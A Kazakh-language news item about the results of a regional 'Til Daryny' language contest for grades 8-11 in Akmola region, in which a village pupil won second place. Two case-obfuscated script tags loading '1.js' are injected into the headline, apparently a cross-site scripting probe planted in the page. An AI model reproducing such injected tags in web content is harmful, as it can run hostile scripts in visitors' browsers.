8-11 сынып оқушылары арасында өткізілген «Тіл Дарыны» облыстық байқауының қорытындысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
04.03.2021
2021 жылғы 16-17 ақпан аралығында Ақмола облысы білім басқармасының жанындағы «Өнерпаз дарынды балалармен жұмыс жүргізу жөніндегі облыстық оқу-әдістемелік орталығы» базасында "Рухани жаңғыру" бағдарламасын жүзеге асыру аясында 8-11 сынып оқушылары арасында облыстық «Тіл дарыны» байқауы өтті.
Байқаудың мақсаты - іскерлік және халықаралық коммуникацияларға арналған құрал ретінде тілдерді меңгеру деңгейін анықтау. Үш тілді мемлекеттік саясат ретінде насихаттау, Қазақстан Республикасының тіл саясатын жүзеге асыру, оқушылардың тілдерді меңгеруге деген қызығушылығын артыру, тіл мәдениетін дамыту. Жан-жақты дамыған, бәсекеге қабілетті тұлғаны тәрбиелеу.
Аталған байқау Қазақстанда көптілді білім беруді енгізудің Ұлттық жоспарына қолдау болды.
Байқауға облыс бойынша 17 ауданнан, Көкшетау, Стеногорск қалалары мен облыстық дарынды балаларға арналған мамандандырылған мектеп интернаттарынан барлығы 85 оқушы қатысты.
Жақсы ауданының атынан Жаңа Қима ауылының Ғұбайдолла Әбдірахманов атындағы орта мектебінің 9 сынып оқушысы қатысты. Тілдер бойынша жақсы білімін көрсете алды. Әділқазылар алқасының шешімен Рамазан Мадина жүлделі екінші орынға ие болды.
Жүлдегерлерімізді жеңісімен құттықтаймыз, алдағы уақытта да табыс тілейміз.